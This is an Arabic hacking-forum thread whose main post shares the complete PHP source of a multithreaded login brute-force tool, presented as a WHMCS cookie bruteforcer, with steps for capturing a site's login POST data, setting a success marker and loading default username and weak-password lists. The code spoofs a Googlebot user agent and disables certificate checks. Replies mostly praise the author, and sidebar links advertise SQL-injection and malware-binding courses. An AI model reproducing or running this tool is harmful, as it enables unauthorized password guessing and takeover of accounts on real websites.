1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ سكربت ] يعمل بروت فورس whmcs cookie bruteforcer

الموضوع في 'قسم الأدوات' بواسطة Ubuntu, بتاريخ ‏25 يوليو 2013.

كاتب الموضوع : Ubuntu المشاهدات : 1,120 الردود : 6 ‏25 يوليو 2013
حالة الموضوع:
مغلق
  1. غير متصل

    Ubuntu
    rankrank
    Developer

    عضو منذ:
    ‏6 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    [​IMG]


    صحا فطوركم و صحا سحوركم
    سكربت يعمل بروت فورس طبعآ غني عن التعريف
    whmcs cookie bruteforcer
    صوره للسكربت


    [​IMG]


    نأتي للشرح مباشرة :


    Target


    تضع هنا رابط الموقع كامل
    في بعض الاحيان البيانات تعمل بوست لصفحة اخرى لذلك يجب و ضع الرابط الذي يذهب اليه البوست


    Post Data


    اولا نذهب الى صفحة دخول الموقع المراد عمل بروت فورس له :


    اليوزر :
    كود PHP:
    user_massacreur
    الباس:
    كود PHP:
    pass_massacreur

    الاستخراج البوست داتا استعمل اضافة فيرفوكس


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    ننسخ كامل عمليات البوست و الGET ان وجدت مع ملاحظة عمليات ال GET يوضع مع Target


    Marqueur positif
    هنا كل واحد و حيله يعني ما هو الاسم الموجود في اللوحة عند الدخول وليس موجود قبل الدخول
    هذا اهم جزء في السكربت لازم تكون كلمة مميزة


    MultiThreading
    السرعة : لم اضع رقم واضح انا افضل 20 و هناك عداد اضفته للتجربة
    يعني مدة البروت فورس


    الباقي وا ضح


    السورس كود :

    كود PHP:
     <?php
    /*
      coded by Massacreur || toxico-dz
      email : webservers@hotmail.fr
      Greetz :

        ||  alzher   ||   r0ckin  ||  Sql-Sniper || i-Hmx  || band3r  || Omleet-dz ||

      home : sec4ever.com

    */


    set_time_limit(0);
    if (isset (
    $_POST['target']) and isset ($_POST['data']) and isset ($_POST['users']) and isset ($_POST['passwords'])) {
      function 
    cln_arr($array) {
        return @ 
    array_filter(@ array_unique($array));
      }
      function 
    addHandle(& $curlHandle$url$post false$flw 1$timeout 30$cookies 1) {
        
    $cURL curl_init();
        
    curl_setopt($cURLCURLOPT_RETURNTRANSFER1);
        
    curl_setopt($cURLCURLOPT_URL$url);
        
    curl_setopt($cURLCURLOPT_SSL_VERIFYPEER0);
        
    curl_setopt($cURLCURLOPT_HEADER0);
        if (
    $cookies == 1) {
          
    curl_setopt($cURLCURLOPT_COOKIEFILEgetcwd() . '/cookie.txt');
          
    curl_setopt($cURLCURLOPT_COOKIEJARgetcwd() . '/cookie.txt');
        }
        
    curl_setopt($cURLCURLOPT_USERAGENT'Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)');
        
    curl_setopt($cURLCURLOPT_FOLLOWLOCATION$flw);
        
    curl_setopt($cURLCURLOPT_TIMEOUT$timeout);
        if (
    $post) {
          
    curl_setopt($cURLCURLOPT_POST1);
          
    curl_setopt($cURLCURLOPT_POSTFIELDS$post);
        }
        
    curl_multi_add_handle($curlHandle$cURL);
        return 
    $cURL;
      }
    //execute the handle until the flag passed to function is greater then 0
      
    function ExecHandle(& $curlHandle) {
        
    $flag null;
        do {
          
    curl_multi_exec($curlHandle$flag);
    //fetch pages in parallel
        
    } while ($flag 0);
      }
      
    $url $_POST['target'];
      
    $data $_POST['data'];
      
    $mark '/' $_POST['mark'] . '/';
      
    $multithreading $_POST['multithreading'];
    //login=user_massacreur&password=pass_massacreur
      
    $users cln_arr(explode("\n"$_POST['users']));
      
    $passwords cln_arr(explode("\n"$_POST['passwords']));
      
    $data trim($data);
      for (
    $i 0; isset ($users[$i]); $i++) {
        
    $post_0[] = preg_replace('/user_massacreur/'trim($users[$i]), $data);
      }
      for (
    $i 0; isset ($post_0[$i]); $i++) {
        for (
    $h 0; isset ($passwords[$h]); $h++) {
          
    $post[] = preg_replace('/pass_massacreur/'trim($passwords[$h]), $post_0[$i]);
        }
      }
      
    $start_time time();
      for (
    $k 0; isset ($post[$k $multithreading]); $k++) {
        
    $jstart + ($k) * $multithreading;
        
    $jstop + ($k 1) * $multithreading;


        
    $curlHandle curl_multi_init();
        for (
    $i $jstart$jstop $i and isset ($post[$i]); $i++)
          
    $curl[$i] = addHandle($curlHandle$url$post[$i], 1301);
        
    ExecHandle($curlHandle);
        for (
    $i $jstart$jstop $i and isset ($post[$i]); $i++) {
          
    $text[$i] = curl_multi_getcontent($curl[$i]);
          if (
    preg_match($mark$text[$i])) {
            
    $baki= ($i 1)%count($passwords) ;  //48=3*15+3
            
    $id_user=($i-$baki1) / count($passwords);
            
    $id_pass=$baki   ;
            echo 
    '<font size="4" color="#FF0000">' . ($i 1) . ') yes  === > the user is :     <font size="4" color="#FF00FF">'.$users[$id_user].'</font>      the pass is : <font size="4" color="#FF00FF">'.$passwords[$id_pass-1].'</font><br /></font>';
          }
          else { echo (
    '<font size="4" color="#0000FF">' . ($i 1) . ') non  === > ' $post[$i] . '</font> <br />');}
        }
        for (
    $i $jstart$jstop $i and isset ($post[$i]); $i++)
    //remove the handles
          
    curl_multi_remove_handle($curlHandle$curl[$i]);
        
    curl_multi_close($curlHandle);
      }
      
    $end_time time();
      
    $duree $end_time $start_time;
      echo 
    '<center><font size="7" color="#00FF00"> N° of pass tested :'.count($post).' pass /'$duree ' sec</font></center>';

    }
    else {
      echo 
    "

      <!DOCTYPE html PUBLIC '-//W3C//DTD XHTML 1.0 Strict//EN'
        'http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd'>
        <head>
      <title>Multithreading Brute Force Standard</title>
    </head>

    <body>

    <center><br>
            <h2>Multithreading Brute Force Standard</h2>
    <br>
    <form name='dz' method='POST' action=''>
        &nbsp;&nbsp;&nbsp;  &nbsp;&nbsp;&nbsp;&nbsp;Target&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;      : <input name='target' />     <br /><br />
       &nbsp;&nbsp;&nbsp; &nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Post Data&nbsp;&nbsp;&nbsp;&nbsp;    : <input name='data' /> <br /><br />
     Marqueur positif : <input name='mark' value='logout' /> <br /><br />
      MultiThreading  : <input name='multithreading' value='20' /> <br /><br />
    <textarea rows='10' name='users' id='targets' cols='30'>admin
    administrateur
    login
    test
    </textarea>
    <textarea rows='10' name='passwords' cols='30'>admin
    123456
    123123
    102030
    159753
    1234567
    test
    12345678
    123456789
    </textarea><br><br>
    <input type='submit'  value='Start BruteForce' />
    </form>
    </center>
    "
    ;
    }
    ?>

    التحميل


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    رابط اخر


    عزيزي الزائر يتوجب عليك التسجيل لمشاهدة الروابط [ تسجيل الدخول ]



    [​IMG]
     


    1 person likes this.
    جاري تحميل الصفحة...
  2. غير متصل

    wesker Hacker
    rank
    Developer

    عضو منذ:
    ‏12 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: يعمل بروت فورس whmcs cookie bruteforcer

    بارك الله فيك يامبدع

    جاري الـ ++ و التقييم + يوشم بالخماسي + لايك

    تستاهل
    &:" ​
     


  3. غير متصل

    Ĝυēναяα
    Developer

    عضو منذ:
    ‏21 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الإقامة:

    رد: يعمل بروت فورس whmcs cookie bruteforcer

    [b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][size=5][color=silver][font=tahoma][b][size=2]» [/size][/b][/font][/color][/size][/size][/font][/b][/size][/font][/b][/size][/font][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][b][font=arial][size=3][color=#419c70][font=tahoma][size=2][b]وَعّليڪُم السُلامَ ورَحَمُــۃ اللهُ وبرڪَإآتــۃ [/b][/size][/font][/color][size=5][color=silver][font=tahoma][b][size=2]»[/size][/b][/font][/color][/size][/size][/font][/b][/size][/font][/b][/size][/font]

    [font=tahoma][size=2][color=#c0c0c0][b]بارك الله فيك يامبدع[/b][/color][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b][/size][/font][/b]
    :{1}:​
     


  4. غير متصل

    Ubuntu
    rankrank
    Developer

    عضو منذ:
    ‏6 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    رد: يعمل بروت فورس whmcs cookie bruteforcer

    شكرا لك اخي
    وبالتوفيق&:":​
     


  5. غير متصل

    Ubuntu
    rankrank
    Developer

    عضو منذ:
    ‏6 يناير 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    6
    نقاط الجائزة:

    رد: يعمل بروت فورس whmcs cookie bruteforcer

    موفق اخي ​
     


  6. غير متصل

    Stav Ak
    rank
    Developer

    عضو منذ:
    ‏18 يونيو 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: يعمل بروت فورس whmcs cookie bruteforcer

    دورک ؟
     


  7. غير متصل

    massacreur
    rank
    Developer

    عضو منذ:
    ‏24 ابريل 2013
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: يعمل بروت فورس whmcs cookie bruteforcer

    حبيبي
    السكربت تبعي لكن الظاهر انك خلطت بين السكربتين
    هذا السكربت يعمل brute force على اي سكربت وليس whmcs
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...